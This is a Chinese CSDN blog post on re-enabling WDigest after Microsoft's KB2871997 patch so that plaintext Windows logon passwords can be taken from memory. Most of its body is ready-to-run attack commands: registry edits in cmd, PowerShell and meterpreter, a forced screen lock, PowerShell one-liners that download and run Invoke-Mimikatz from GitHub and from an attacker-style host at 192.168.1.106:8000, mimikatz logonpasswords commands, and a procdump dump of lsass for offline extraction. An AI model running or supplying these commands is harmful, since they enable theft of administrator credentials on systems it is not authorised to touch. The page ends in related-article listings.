KB2871997补丁绕过

最新推荐文章于 2024-05-11 15:00:00 发布
最新推荐文章于 2024-05-11 15:00:00 发布
阅读量407 收藏 3
点赞数
分类专栏: 内网渗透 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu3511606536/article/details/129269596
版权

KB2871997补丁绕过

微软为了防止用户的明文密码在内存中泄露,发布了KB2871997补丁,关闭了Wdigest功能。Windows Server2012及以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。Windows Server2012以下版本,如果安装了KB2871997补丁,攻击者同样无法获取明文密码。

在命令行环境开启或关闭Wdigest Auth,有如下两种方法:

开启

cmd

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

powershell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

meterpreter

reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 1

关闭

cmd

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

powershell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 0

meterpreter

reg setval -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest -v UseLogonCredential -t REG_DWORD -d 0

强制锁屏

在开启 Wdigest Auth 后,需要管理员重新登录才能逮到明文密码。

我们可以强制锁屏,让管理员重新登录。

cmd

rundll32 user32.dll,LockWorkStation

powershell

powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/kiraly15/Lock-WorkStation/master/Lock-WorkStation.ps1');"

经测试 Win10企业版 仅锁屏读明文失败,需要注销才行,其它版本未知。

手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码

抓取明文

开启 Wdigest Auth 后,接下来就用常规的抓取明文的方式就行了。

powershell

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.106:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz

本地上传exe执行

privilege::debug
sekurlsa::logonpasswords

离线抓取

Mimikatz 被杀,可以先将 lsass 进程 dump 下来,在本地用 Mimikatz 读取。

1、dump进程

可以用微软提供的 [procdump](https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump) ,自带微软签名,可以过杀软。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2、Mimikatz读取

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
L1nYuan
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
防范明文密码和散列值抓取
weixin_41082546的博客
02-12 1217
一、单机密码抓取的防范方法   微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。   通过查看注册表键值,可以判断Wdigest功能状态...
Microsoft KB2871997的学习
Ping_Pig的博客
10-29 3598
讲在前面 2014年,Microsoft发布了KB2871997补丁,它主要囊括了Windows 8.1和Windows Server 2012 R2中增强的安全保护机制。所以,以往的例如:Windows 7,Windows 8,Windows Server 2008R2和Windows Server 2012也可以更新该补丁后获得上述安全保护机制。 介绍 增强的安全保护机制中有如下部分几点: 减少存储在内存中的凭据数据 支持现代身份验证(Kerberos AES) 其实主要防范的是在身份登录时凭
域渗透——Dump Clear-Text Password after KB2871997 installed
weixin_34277853的博客
03-08 388
三好学生 · 2016/06/15 10:240x00 前言在渗透测试中,渗透测试人员通常会使用mimikatz从LSA的内存中导出系统的明文口令,而有经验的管理员往往会选择安装补丁kb2871997来限制这种行为。这其中涉及到哪些有趣的细节呢?本文将会一一介绍。图片来自pixabay.com/zh/%E5%AF%8…0x01 简介KB2871997:更新KB2871997补丁后,可禁用Wdige...
Windows密码破解常见手段
最新发布
2301_80127209的博客
05-11 865
值得一提的是,这个项目能过windows defender 进行dump lsass内存,且只把相关的内容给dump下来,非常的香!申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。这也是github上面的项目,很热乎,刚提交不交,被我无意间发现了,这就是个宝藏。
mimikatz的原理,哪个补丁导致了mimikatz无法获取明文密码,如何绕过?
Ping_Pig的博客
11-10 3616
讲在前面: 对于mimikatz的原理本文只通过简单的话语表述,并在文章后给出分析的思路和参考文章。对于绕过补丁,本文只对KB2871997补丁做阐述,并且犹豫对mimikatz的介绍文章非常之多,所以本文只取重点罗列,让读者能够简单快速的明白关键点,深入理解在文章后给出分析思路和参考文章。 mimikazt的原理 注意:本文对mimikatz获取lsass.exe进程中明文密码的原理做简单描述。 开发语言:C/C++。 开发初衷:深入学习Windows系统以及C/C++语言。 获取明文密码:
win7 补丁包,俄罗斯大神补丁,可解决 kb4474419补丁安装失败
01-04
3. **俄罗斯大神补丁**:这指的是由社区专家开发的非官方补丁,这类补丁通常由技术爱好者或独立开发者创建,用于解决官方补丁无法解决的问题,有时可能涉及到系统破解或绕过某些限制。 4. **扩展安全更新(ESU)**...
Win7强制安装补丁
07-12
“Win7强制安装补丁”可能是一个第三方工具,它的工作原理可能是通过绕过Windows Update服务,直接对系统注册表或系统文件进行修改,以强制安装那些原本无法应用的补丁。这种工具在使用时需要谨慎,因为不正确的操作...
关于KB951748补丁不能卸载的小程序
09-12
这个工具专门针对KB951748设计,能够绕过常规路径,直接执行卸载过程,从而避免了上述问题。在使用这个工具时,确保关闭所有不必要的程序,以防止任何潜在的干扰,并按照屏幕上的指示进行操作。 总之,KB951748补丁...
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
Microsoft --------- Microsoft已经为此发布了一个安全公告(MS14-076)以及相应补丁: MS14-076:Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) 链接:...
weblogic9破解补丁
08-11
在【标题】"weblogic9破解补丁"中提到的"破解补丁",通常指的是为了绕过软件的授权机制而使用的非法修改,这在合法和道德层面都是不被允许的。然而,对于学习和理解WebLogic的运行机制,我们可以探讨一些与WebLogic ...
从mimikatz抓取密码学习攻防
hongduilanjun的博客
07-21 1820
前不久在使用mimikatz抓取hash的时候遇到了报错,本着追根溯源的原则去查看了mimikatz抓取密码的原理。在学习的过程中发现了mimikatz的每种报错都有不同的原因,本文就从mimikatz的防御角度出发来分析如何防御mimikatz抓取密码。...
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
AA8j的博客
07-26 485
拓扑图 Windows系统散列值获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
Windows系统密码抓取与防护
qq_43590351的博客
09-10 1513
Windows系统密码抓取与防护 单机密码抓取与防范 LM Hash 和NTLM Hash LM Hash(DES加密) 默认禁用,一般攻击者抓取的LM Hash值为aad3b435b51404eeaad3b435b51404ee 表示LM Hash为空值或被禁用 NTLM Hash(MD4加密) 真正是用户密码的哈希值 Windows操作系统中的密码一般由两部分组成: 一部分为LM Hash,另一部分为NTLM Hash。在Windows中,Hash的结构通常如下: Username:RID:LM-Ha
【已解决】未解决-mimikatz尝试获取win10明文口令报错
热门推荐
高冷的宅先生
04-06 1万+
1.说明 尝试用mimkatz抓取win10明文口令 按照网上的说明,修改了注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 使用时注意各种以管理员运行 使用ProcDump和任务管理器lsass都创建转储文件...
Windows明文密码获取
xiangshen1990的博客
03-14 3259
Windows明文密码获取1:简介2:前提3:无安全软件3.1:在线获取3.2:离线获取4:针对symantec为代表的各种EDR抓取4.1:思路4.2:实现后记 1:简介 作者为网络安全从业者,专注红蓝对抗、本文尝试通过框架性梳理的方式来整理一些细致的知识点,将它们串联起来方便记忆。 本文将探讨如下几个方面的内容: 1:无安全软件情况下获取windows明文密码的方法。 2:针对symantec...
内网安全-域横向批量at&schtasks&impacket
m0_61506558的博客
10-22 1071
获取到某域主机权限-> minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做字典->尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令。在3中都是批处理命令,只能遍历一个变量,如果想要遍历多个变量,比如IP、用户名、密码等,可以写python脚本,免杀,使用Pyinstaller打包成exe文件,上传到目标机器运行。命令的使用,在已知目标系统的用户明文密码的基础上,直接可在远程主机上执行命令。建立IPC常见的错误代码。
高级域渗透技术之传递哈希已死-LocalAccountTokenFilterPolicy万岁
systemino的博客
04-30 1654
大约三年前,我写了一篇名为"传递哈希已死: 长久的哈希传递方法介绍"的文章,详细阐述了微软 KB2871997补丁的一些操作含义。 在安全建议中有一句特别的话,"这个功能的改变包括: 防止网络登录和使用本地帐户远程交互登录到加入域的机器… …"使我相信(在过去3年中)补丁修改了 Windows 7和 Server 2008的行为,以防止通过非 rid 500的本地管理员帐户传递哈希的能力。 我的同...
内网渗透体系学习4
m0_55772907的博客
10-25 898
内网
KB4012212 KB4012215补丁安装
10-23
根据提供的引用内容,KB4012212补丁是为了预防《永恒之蓝》病毒而推出的预防补丁。而KB4012215补丁Windows 7和Windows Server 2008 R2的月度质量更新。如果您的电脑无法安装KB4012212补丁,可以尝试以下方法: 1.确保您的电脑已经安装了KB947821补丁,如果没有安装,需要到微软官网下载对应版本的补丁。 2.如果您已经安装了KB947821补丁,但仍然无法安装KB4012212补丁,可以尝试手动下载并安装该补丁。 3.如果手动下载并安装仍然无法解决问题,可以尝试运行Windows更新故障排除程序,该程序可以自动检测和修复Windows更新相关的问题。 4.如果以上方法都无法解决问题,可以尝试联系微软客服或者专业的技术支持人员寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值